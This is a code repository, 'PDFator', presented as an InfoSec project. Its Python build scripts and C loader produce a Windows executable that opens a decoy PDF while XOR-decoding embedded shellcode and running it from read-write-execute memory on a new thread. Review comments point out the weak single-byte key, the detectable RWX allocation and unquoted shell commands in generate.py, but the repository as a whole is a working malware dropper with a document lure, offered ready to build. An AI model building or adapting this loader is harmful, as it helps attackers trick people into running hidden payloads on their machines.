├── README.md ├── Src ├── icon.ico ├── main.c ├── makefile └── resources.rc ├── generate.py └── xorfile.py /README.md: -------------------------------------------------------------------------------- 1 | # PDFator 2 | 3 | PDFator is an InfoSec project that consists of a Python script and a C application to generate an executable payload. The payload includes functionality to write a PDF file to disk and open it, and to execute shellcode. Both the PDF file and shellcode are encrypted using XOR and decrypted at runtime. The XOR key is a fixed single byte (`0xff` in both `xorfile.py` and `Src/main.c`), so this is obfuscation rather than confidentiality: the embedded content can be recovered from the binary by inspection. 4 | 5 | ## Requirements 6 | 7 | To run this project, you need the following: 8 | 9 | - Python 3.x 10 | - MinGW (Minimalist GNU for Windows) 11 | 12 | --- 13 | 14 | MinGW can be downloaded from http://musl.cc/ (the link is plain HTTP, so verify the integrity of the toolchain you download). 15 | 16 | ## Usage 17 | 18 | 1. Clone the repository: 19 | ```bash 20 | git clone https://github.com/smokeme/PDFator.git 21 | ``` 22 | 2. Change into the project directory: 23 | ```bash 24 | cd PDFator 25 | ``` 26 | 3. Prepare the payload by running the Python script: 27 | ```bash 28 | python generate.py <shellcode_file> <pdf_file> 29 | ``` 30 | Replace `<shellcode_file>` with the path to your shellcode file, and `<pdf_file>` with the path to your PDF file. 31 | The generated payload can be found in the project root directory with the name `payload.exe`. 32 | 33 | 34 | ## License 35 | 36 | This project is licensed under the MIT License. 
37 | -------------------------------------------------------------------------------- /Src/icon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/smokeme/PDFator/0f5db37778df2a3775c3e6b3e256fbed0774c3ba/Src/icon.ico -------------------------------------------------------------------------------- /Src/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #define SHELLCODE_ID 101 7 | #define PDF_ID 102 8 | 9 | #pragma comment(lib, "shlwapi.lib") 10 | 11 | void xorDecrypt(unsigned char* data, size_t size, unsigned char key) { /* XORs each of the size bytes in data with key, in place; XOR is its own inverse, so the same routine both encodes and decodes. */ 12 | for (size_t i = 0; i < size; i++) { 13 | data[i] = data[i] ^ key; 14 | } 15 | } 16 | 17 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { /* Entry point: decodes the embedded PDF resource, writes it next to the executable and opens it, then decodes the second resource into executable memory and runs it on a new thread. Always returns 0; every failure branch is empty. */ 18 | unsigned char xorKey = 0xff; /* NOTE(review): fixed single-byte key, the same constant xorfile.py applies at build time; this is obfuscation only, so both resources are recoverable by static inspection of the binary. */ 19 | // Write the PDF from the embedded resource (PDF_ID) to a file after decrypting it 20 | 21 | HRSRC hPDFRes = FindResource(hInstance, MAKEINTRESOURCE(PDF_ID), TEXT("RT_STRING")); /* NOTE(review): the type is passed as the string "RT_STRING", which presumably selects a custom named resource type rather than the predefined string-table type; confirm against resources.rc. */ 22 | if (hPDFRes) { 23 | HGLOBAL hPDFData = LoadResource(hInstance, hPDFRes); 24 | if (hPDFData) { 25 | DWORD pdfSize = SizeofResource(hInstance, hPDFRes); 26 | void* pdfData = LockResource(hPDFData); 27 | if (pdfData) { 28 | unsigned char* decryptedPDF = malloc(pdfSize); 29 | if (decryptedPDF) { 30 | memcpy(decryptedPDF, pdfData, pdfSize); 31 | xorDecrypt(decryptedPDF, pdfSize, xorKey); 32 | // Write the decrypted PDF data to the file 33 | TCHAR modulePath[MAX_PATH]; 34 | if (GetModuleFileName(NULL, modulePath, MAX_PATH) != 0) { 35 | // Remove the module filename from the path 36 | PathRemoveFileSpec(modulePath); 37 | 38 | // Combine the path with the PDF file name 39 | TCHAR pdfPath[MAX_PATH]; 40 | if (PathCombine(pdfPath, modulePath, TEXT("file.pdf")) != NULL) { 41 | // Create a file handle for writing 42 | HANDLE hFile = CreateFile(pdfPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 
NULL); 43 | if (hFile != INVALID_HANDLE_VALUE) { 44 | // Write the decrypted PDF data to the file 45 | DWORD bytesWritten; 46 | if (WriteFile(hFile, decryptedPDF, pdfSize, &bytesWritten, NULL) && bytesWritten == pdfSize) { 47 | // File writing succeeded 48 | ShellExecute(NULL, TEXT("open"), pdfPath, NULL, NULL, SW_SHOWNORMAL); /* Opens the file.pdf just written beside the executable using the shell's "open" verb. */ 49 | } 50 | else { 51 | } 52 | CloseHandle(hFile); 53 | } 54 | else { 55 | } 56 | } 57 | else { 58 | } 59 | } 60 | else { 61 | } 62 | free(decryptedPDF); 63 | } 64 | else { 65 | } 66 | } 67 | else { 68 | } 69 | FreeResource(hPDFData); 70 | } 71 | else { 72 | } 73 | } 74 | else { 75 | } 76 | 77 | HRSRC hShellcodeRes = FindResource(hInstance, MAKEINTRESOURCE(SHELLCODE_ID), TEXT("RT_STRING")); /* Second stage: the same lookup for resource SHELLCODE_ID (101). */ 78 | if (hShellcodeRes) { 79 | HGLOBAL hShellcodeData = LoadResource(hInstance, hShellcodeRes); 80 | if (hShellcodeData) { 81 | DWORD shellcodeSize = SizeofResource(hInstance, hShellcodeRes); 82 | void* shellcode = LockResource(hShellcodeData); 83 | if (shellcode) { 84 | xorDecrypt(shellcode, shellcodeSize, xorKey); 85 | HANDLE lpAddr = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); /* NOTE(review): read-write-execute allocation that receives the decoded resource bytes and is then passed to CreateThread as the start address; private RWX memory with a thread start inside it is a standard detection point for memory scanners and EDR. */ 86 | if (lpAddr) { 87 | memcpy(lpAddr, shellcode, shellcodeSize); 88 | } 89 | else { 90 | } 91 | HANDLE hThread = CreateThread(NULL, 0, lpAddr, NULL, 0, NULL); 92 | if (hThread) { 93 | WaitForSingleObject(hThread, INFINITE); /* Blocks until the new thread exits. */ 94 | CloseHandle(hThread); 95 | } 96 | else { 97 | } 98 | } 99 | else { 100 | } 101 | FreeResource(hShellcodeData); 102 | } 103 | else { 104 | } 105 | } 106 | else { 107 | } 108 | 109 | return 0; 110 | } 111 | -------------------------------------------------------------------------------- /Src/makefile: -------------------------------------------------------------------------------- 1 | CC = x86_64-w64-mingw32-gcc 2 | RC = x86_64-w64-mingw32-windres 3 | CFLAGS = -mwindows 4 | LDFLAGS = -lshlwapi 5 | 6 | all: main.exe 7 | 8 | main.exe: main.o resources.o 9 | $(CC) $(CFLAGS) -o $@ $^ $(LDFLAGS) 10 | 11 | main.o: main.c 12 | $(CC) 
$(CFLAGS) -c $< -o $@ 13 | 14 | resources.o: resources.rc 15 | $(RC) -o $@ $< 16 | 17 | clean: 18 | rm -f main.o resources.o main.exe -------------------------------------------------------------------------------- /Src/resources.rc: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | IDI_ICON1 ICON "icon.ico" 4 | #define SHELLCODE_ID 101 5 | #define PDF_ID 102 6 | 7 | SHELLCODE_ID RT_STRING "1.bin" 8 | PDF_ID RT_STRING "1.pdf" 9 | 10 | 1 VERSIONINFO 11 | FILEVERSION 1,0,0,0 12 | PRODUCTVERSION 1,0,0,0 13 | FILEOS VOS_NT_WINDOWS32 14 | FILETYPE VFT_APP 15 | BEGIN 16 | BLOCK "StringFileInfo" 17 | BEGIN 18 | BLOCK "040904E4" 19 | BEGIN 20 | VALUE "CompanyName", "Your Company Name" 21 | VALUE "FileVersion", "1.0.0.0" 22 | VALUE "InternalName", "MyApp" 23 | VALUE "OriginalFilename", "MyApp.exe" 24 | VALUE "ProductName", "MyApp" 25 | VALUE "ProductVersion", "1.0.0.0" 26 | END 27 | END 28 | 29 | BLOCK "VarFileInfo" 30 | BEGIN 31 | VALUE "Translation", 0x409, 1252 32 | END 33 | END 34 | -------------------------------------------------------------------------------- /generate.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | 4 | def generateExe(): # Builds Src with make, moves Src/main.exe to payload.exe, then cleans the build and deletes Src/1.bin and Src/1.pdf; os.system() return codes are not checked. 5 | # run "make" in the Src folder to generate the executable file 6 | os.system("cd Src && make") 7 | # move the executable file to the current folder 8 | os.system("mv Src/main.exe payload.exe") 9 | # Clean the Src folder 10 | os.system("cd Src && make clean") 11 | # Remove the 1.bin and 1.pdf in the Src folder 12 | os.system("rm Src/1.bin") 13 | os.system("rm Src/1.pdf") 14 | print("[+] payload.exe is ready to be used") 15 | 16 | def prepare(raw_shellcode,pdf_file): # Checks that both input paths exist, XORs each through xorfile.py, and moves the results to Src/1.bin and Src/1.pdf. 17 | # Check if the files exist or not; exits with status 1 when either path is missing 18 | if not os.path.exists(raw_shellcode): 19 | print("File not found: " + raw_shellcode) 20 | exit(1) 21 | if not os.path.exists(pdf_file): 22 | print("File not found: " + pdf_file) 23 | exit(1) 24 | # use 
the file xorfile.py to xor the shellcode and the pdf file and save them as 1.bin and 1.pdf inside the Src folder 25 | os.system("python xorfile.py " + raw_shellcode + " 1.bin") 26 | os.system("python xorfile.py " + pdf_file + " 1.pdf") 27 | # move the 1.bin and 1.pdf to the Src folder 28 | os.system("mv 1.bin Src/1.bin") 29 | os.system("mv 1.pdf Src/1.pdf") 30 | print(f"[+] {raw_shellcode} and {pdf_file} are ready to be used as payload") 31 | 32 | if __name__ == "__main__": 33 | args = sys.argv 34 | if len(args) != 3: 35 | print("Usage: python generate.py ") 36 | exit(1) 37 | raw_shellcode = args[1] # NOTE(review): both paths come straight from sys.argv, and prepare() concatenates them unquoted into os.system() shell commands. 38 | pdf_file = args[2] 39 | prepare(raw_shellcode, pdf_file) 40 | generateExe() -------------------------------------------------------------------------------- /xorfile.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | def xor(input): # Returns a new bytearray with every byte of input XORed with the fixed key 0xff; applying it twice yields the original bytes. The parameter name shadows the builtin input(). 4 | output = bytearray(len(input)) 5 | for i in range(len(input)): 6 | output[i] = input[i] ^ 0xff 7 | return output 8 | 9 | def main(): # Reads sys.argv[1] as bytes, XORs it with xor(), and writes the result to sys.argv[2]. 10 | with open(sys.argv[1], 'rb') as filein: 11 | filedata = bytearray(filein.read()) 12 | 13 | fileout = open(sys.argv[2], 'wb') # NOTE(review): closed manually below rather than by a with block, so the handle stays open if write() raises. 14 | fileout.write(xor(filedata)) 15 | fileout.close() 16 | 17 | if __name__ == '__main__': 18 | main() 19 | --------------------------------------------------------------------------------